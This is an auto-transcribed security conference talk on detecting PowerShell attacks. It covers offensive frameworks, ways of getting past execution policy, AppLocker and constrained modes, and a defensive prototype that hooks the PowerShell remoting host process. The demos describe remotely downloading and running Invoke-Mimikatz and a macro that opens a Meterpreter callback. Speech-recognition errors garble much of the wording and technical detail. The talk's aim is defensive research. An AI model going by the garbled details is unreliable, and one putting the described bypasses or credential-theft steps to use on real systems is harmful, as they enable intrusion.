Pornsook Kornkitichai – Defend PowerShell Attacks When All Else Fails

hello everyone and my name is pancho conte di I come from Thailand and today I’m going to talk about how to defend powerful attacks when all every defense fails but before going further I would like to introduce you a bit more about myself I’m working as a senior manager and lead of security assessment team at a scene for tech Thailand and basically and my everyday classes look a lot about pen testing or doing some kind of IT security consulting and my this research eaten interest is about offensive security and sometimes is about defensive security about cyber warfare now the topics that I’m going to cover for today and there’s several ones first one is about I’m going to talk powershell and its offensive sites next is about why our defense against the PowerShell attack fails next I’m going to talk how and why it is quite difficult to do some implementation to defend the PowerShell and next I’m going to introduce you the prototype our shed to defend those attacks and then I’m going to do some demonstration basically if you have ever used polish know before you might have the question why that’s PowerShell in the new version of window I’m going to talk about a little bit about PowerShell because when you go into in the door stay in window we have just recommend but sometimes later they’re open Microsoft would like to have some kind of power culture powerful come alive like share in Linux but as you know it’s different platform in Linux is five best platform but in Windows API and object based so we cannot implement that some kind of chair con man look like the chair in ladakh so they create things like power shell and Bill other thing just cover it but since 2000 intense there have been lots of solo works and research related to offensive offensive side the poll shows I’m quite certain that a lot of people here have all seen this leads of offensive powershell models before but I would like to give you a quick overview of each of modules the first one is post Lloyd power sprays a collection of post exploitation PowerShell models if you a pen tester you can use it to bypass in the world to invoke some chill or injection or you can use it to do some data exfiltration another framework is Michelle nishang is a collection of PowerShell scripts and payloads the Pinda member of our submission is just all if offensive security Nexus view power will if you have a worse heard of view framework before this model is the same order the idea of power wheel is used when Penn deser would like to add hexham environment but that enrollment disabled neptr man so the author of willpower will create some models to mimic the behavior net command for example you can use get net user or get net grow instead of instead of net user or net groups next is power up one of the is one part of power tools power up is used for local privilege escalation and another frameworks power cut power cadiz net card but is implemented in powershell nexus and is the payload call interactive powershell payload in metasploit if you have a views metadata beef before if you lunch l and then type powershell that exe your session will be forcing because you cannot have an interactive session with the powershell

so in this day there have been the play Lord called interactive PowerShell that you can use and get an interactive to the PowerShell on the target system that will attack and the latest work is total Empire is published in besides last Wiggles this year basically it’s idea about create some kind of PowerShell engine send it to the target system when the target is imran the the powershell asian it connect back to your command and control then you can do anything you want with powershell for example you can send something like what injection or do some drm injection or do anything they want you want with powershell it look like metasploit framework but it’s partial so these are just only some example of offensive security models of the PowerShell next I’m going to talk about why all defense our power of shares fails to kill end the attacks the first one is this is the first line of defense maybe you have heard of this before it’s a execution polarizing if you are new to powershell if you are an onion from user you cannot learn powershell script but if you are in forum user you can learn powershell script as you can see from the screen shot you cannot land powershell script the powershell script format is dot ps1 one thing that you can do is just type the command on the console or just copied the PowerShell script and paste in the in the console and run it that’s the way you can do and if you know about how execution execution policy work you can buy passes normally there are five options for execution policy one is restricted which is the default setting set conditions and sigh of all sigh the third one is remorse I the forces bypassed and five is unrestricted if you just change the option to buy past you can do anything well the main purpose of this execution policy is to play when user from landing the PowerShell script and intentionally it is not decide to defend the attacks so it’s not the defense another technique to bypass execution policies you can use bear 60 64 encoded commands for example if you have the PowerShell script you just encode it to basically t4 and paste it into the couple shell command console and run it you can bypass another thing that I talk about encoded command because some anti-rust when you download when you use some powershell script when you attack the system some anti rest can be take it you can use encode the command to hire yourself but there’s a limitation in window XP and a newer version because the length of the console it limit to allow eight thousand and one hundred some things if you have a very long powershell script you need to do some complexion and then be completely in the memory some people here oh sorry some people in that operator write a model to do this for you so does the book that’s not the problem another protection mechanism is at locker blocker walls introduced since windows 7 and windows 2008 r2 but you can use it only on in the on the enterprise and the ultimate version only the purpose of a plugin is to allow administrators to locked out the system to pre when any running from the unauthorized applications you might have further about software restriction policy is this the same but it is the older technique order system why is this

order because when you set up software restriction policy rules you cannot apply to each user or each group and it’s quite difficult to manage but if you enable what a blocker and software is restricting policy at the same time your machine will choose all the ad lockers rules when you apply a blocker to prevent powershell you can use to block executable files or just powershell script file let’s see if you set the rule here with Posey 0 EXE and is either exe restriction you cannot run it next is you can use to play when any running the partial script files but as you know this is the setting from administrators if the attacker can gain access to the previous at cost pivot level of the system this protection mechanism is useless now moving to some kind of power shell remoting power shell remoting means that if you learn powershell and would like to execute on the remote machine we call this power shell remoting when you use partial remoting you connect you to default as remote session configuration you can find some configuration on your machine with this command get peer session configuration it will list all setting of the remote end point but in newer version of PowerShell from power shall we three and later version you can enable some constraint PowerShell and point what does it mean it means that you can limit the number of the commands that the remote session can use for example i connect to the machine called window 81 window 8.1 something and try to list the number of the command what I got back is around less than 10 command that I can use normally there are more than hundreds commands in PowerShell console so if you want to apply this inside your enterprises organization you could do it but as same as a blocker if an attacker can’t get access to the admin level constraint PowerShell doesn’t help next is a about lockdown polizzi partial locked our policy there’s not much information related to it there’s just two links and the thing is you can use some n women who are available by creating some variable with call PS locked up or I see and set the number two for your powershell console will change the mode into constraint language more what this mean is you can use command you can just come and let in PowerShell but you cannot access any type of Dartmouth object you cannot access class you cannot accept instance because it is in a mode called constraint language more but the same assumption the same thing a tiger know about this very well they can delete is a variable and apply it they can bypass this easily so my world what is my work about my world is working basis on this assumption first attacker could gain access to the previous Picard for example they can gain access to local administrator of the target system they can gain access to one account of domain admin group second assumption is they can enable polish every morning and third all of what i said before of the protection i mentioned earlier attackers know it very well and forth I don’t talk about evil locks because attacker can disable it

that’s it next why is defense against PowerShell attack is difficult some of you might think why we don’t do some hooking or just intercept into win32 API function I did it but it’s quite difficult let let see the screenshot above if you call local PowerShell there will be a PowerShell that exe process on here and then if you do some kind of step dressing or monitoring the stack trace here you will see that there is no proper point to do some cooking or interception of what you can see is dotnet for people that is very near to powershell kosher is implemented with all dotnet objects class and instance library so that’s a no point to intercept winsome win32 api for partially more than you might think that why we don’t do some kind of interception and analyze the traffic or malicious traffic I did it the same basically when we use PowerShell remoting it powershell used the protocol call WS man window a web show with management protocol it land on HTTP and https on port r59 if they signify to statistic sorry 59 actif I’d 286 but when you use HTTP the HTTP content is encrypted you can see only the the HTTP header with is not much give you much more information you can see just only or encrypt with something when you use powershell more than inside domain any moment it is encrypted with kerberos but if you use in the workgroup be encrypted with clap SSP you cannot do any man in the middle however we’ve used HTTPS all HTTP header and content are encrypt twice so it’s very difficult to do some man in the middle here and do some analyzes on malicious traffic but in this year Microsoft published some tools very nice tools basically if you do some traffic or network sniffling you use white shark or tcp down but Microsoft has a need to haul Microsoft message analyzer you can watch some granular details of methods in each event or explosive that window use when a LAN Microsoft message analyzer when I use PowerShell remoting I can see everything you can you just see here everything is installed message because our power shell remoting use web server it you can see some plain text message plan sec plant excommunication you can analyze it but it’s impractical to apply this function into each and every workstation in the organization because it used or utilize and network resource and workstation results too much so this is why it’s quite difficult last year there’s a papers well-known payable in the PowerShell community is investigating power attacks published in Def Con 2014 and black at the same year the pepper try to find information about how to locate some evidence from this form memory and from evil locks when there is a powerful attacks I will give you some liquor before going further because its way onto to my world because this paper were influenced my my platform as well when you do some power shell remoting when you type the command line on your powershell console your comma lie inside

your machine is a.net class and object it will see your eyes and then send it to the the target system the target workstation on the pen us man protocol when that communication cafe received by the dispatcher on the target system it will log here which application has been registered to the dispatcher it will consider whether it is power or not whether if this potion will send it to w sm + horse exe this one this is the target machine when it receives some remote command the more pokemon and if you spawns any other executable files it will spawn another process this paper said that if you want to see some partial command if you want to see some important remnant of the memory you need to do some memory and Isis again w sm proposta exe but the problem is wsm proposed terminal itself immediately after the end of the session that’s why it’s very difficult to do some real time analysis on the memory of the wsm so from the assumption from the laws from the latest study I am going to propose the prototype called power shift you can implement or do to copy my idea to apply to some work station in your organization or just apply to some honey net machine the idea is divided into three components the first one is c2 command and control it I behalf licensure lifelock command receive and send the command receive the even from the Asian or the center second is a client I call it sensor and from my experiment I did it on window 7 and window 8.1 with window up window powershell v2 v3 and v4 another internal component of the sensor three components two adapters and one sensor versus power adapter next is the pineal sm proforce adapter and then sensor sensor is one because it needs to communicate with the sea to you can see number 4 and above files normal voice command from the sea to number five is a traffic or even information from the sensor it is encrypted with AES encryption so I’m going to solve the problem of wsm proposed exe you can see that this is in the Part C windows system32 I will locate the pond us improve horse here you might notice that there are two wsm profiles that exe the real one every machine since window X Windows 7 this i rename it into the benue sm + 1 dot exe you can rename it into anything you want you just change the configuration file in the prototype and the fake one I means the my adapter is the pineal sm / posted exe so next time if there is a PowerShell remoting it will direct co-directing to your adapter some prerequisite is wsm proposed and powershell that exe the owner of this application is not user not their own user is trusted installer if you rename it you need to chain the owner and then after you should rename it you need to share it back this is a prerequisite now what I’m going to intercept is I’m going to intercept some window the t2 API to locate some important information I try to intercept

to process in the initial step the first one is accessed process as I mentioned the problem is it terminal very quickly you cannot do anything with itself so i will cook in excess process because i need to post some time and then do some memorizes before it terminate itself and then i hope with cred process because i would like to know if attacker spawn some other executable files and next is that w x 2 data to do what i want to is to monitor some network traffic because malicious PowerShell models often download things from the network okay this is what I’m going to try to log it inside the memory from the paper investigating power attack they try to Phi do some memory analysis and Phi the pattern of the con man from number 225 but i am from my experiment number one is very important too because it contains some previous command that attacker use ok let let’s see some demonstration I have three demonstrating the the tool with your demonstration the reason is because I need to change the aiming to turn on and turn off some power shell and os we need to take some time so i will show video demonstration for two and life for one ok the first demonstration is series of we more partial command window for windows seven is is the client yeah let’s see this is a c2 i learn it on my mac you will see later this is that sport I applied in a quick interface now i’m going to learn the sensor okay the sensor started next I am switch to Windows 2008 to do some culture rewarding we know 71 how shall we three and in Windows 2000 partially to I try to do some remodeling with enter PS session with kerberos encrypted because if inside domain window dome and I use serious of command get horse get person in get process and with some pie line ok next I have terminated that session and then I’m going to go back to the current console I’m going to pause here you can see I was not listed there is a hook happen after the session two minute when the hoop work it who into three XS process because I would like to do some real time memory analysis but the result of the memory analysis at this point depends on what is inside in the memory some time I got important clues

sometimes I got nothing it depends now back to the dashboard you can see it there’s a some some lock sorry here you you can see some commands but not one hundred percent because I just got some wind remnants of the memory at that time if you enter Pierre session for long terms maybe you can get just only thirty percent because I just hope into exit process ollie next I’m going to do some live demonstration okay first I’m going to learn my HTTP server first because I put some malicious powershell script here then I’m going to learn C 2 okay see two works going to window 8.1 this is a client I will learn the sensor you can notice that it is one under administrative peerage back to you window 2012 I’m going to use in walk command in what command means that we want to learn the command lame oddly on the limo on the target machine I want to invoke the command to the competent name call window a one with the command inside the desolate here i use IES mean that we have to we want to download some script that script is in walk mimic at dot ps1 from this IP address which is my Mac machine and then lon invoke mimikatz so let’s see okay so what about the demonstration i’m not sure why that’s problem here just not sure about this because i have just only five minutes left i’m going to show you some work some of my video demonstration instead is the same okay if I start a sensor in window 8.1 now

I’m going back to the north 2012 again and then use in work combined in what we make a try to locate some period occur in paintings but as you know if you learn on window 2012 r2 you cannot see anything important and it finished in welcome and then back to window 8.1 again you can see it there is some soil okay there’s a hooking and as a capturing here capturing means that if there is some Network downloading from the internet from the network it will capture something at its end to the sea to now it finished hooking back to the dashboard again now you can see that there is a a fly that the PowerShell remoting from in whatcom and download from the network is a powershell script if you use a general protection mechanism you cannot see it cities because it’s encrypted you need to do some brutal memory and Isis ollie and the last one is I show you some remote demonstration but this one is no hope our show at macro attack I use the script from this you are let’s see what it looked like I start a multi-hundred to listen for metal feta to call back now point back to windows sale and imagine that this is a user try to open some macro enable macro and then everything seems to be okay and then back to you Kelly the Talmud a pretty back this macro use mauritius powershell inside now back to our dashboard yeah you can see it there is a complete potion whole from that macro the final thing that I would like to remind you is powershell is not powers out of exe or is not PowerShell ISE dot exe these two just only the horse application inside your window system if the attacker can write that net application themselves that can create malware that directly access to the dot and object class in stand and share everything inside your in window enrollment which my product I cannot detect it at all but if you’re thinking another way if they can run the net application in your machine they don’t need to use PowerShell you can do

anything right and yes this just also application this is the limitation of my work there are some cero work talking about window horse application you can learn from this list and last but not least is the PowerShell v5 this is a gladly improved from the v2 v3 and v4 because there is a feature khan ho and the more ask an interface this is very nice because if you remember that i try to intercept some window the d2 API but this time some guys from Microsoft oh I open API to you and this API you can all which if and the worst company can use these in turn located of find any evidence that can identify which is malicious which is not from hooking so lots of offensive power modules doesn’t work on polish a wave file in windows 10 right now and if you have any questions just ask me here if you want would like to talk much about platform I’m going allowed here for tomorrow and let it thank you for attending the last session for today thank you very much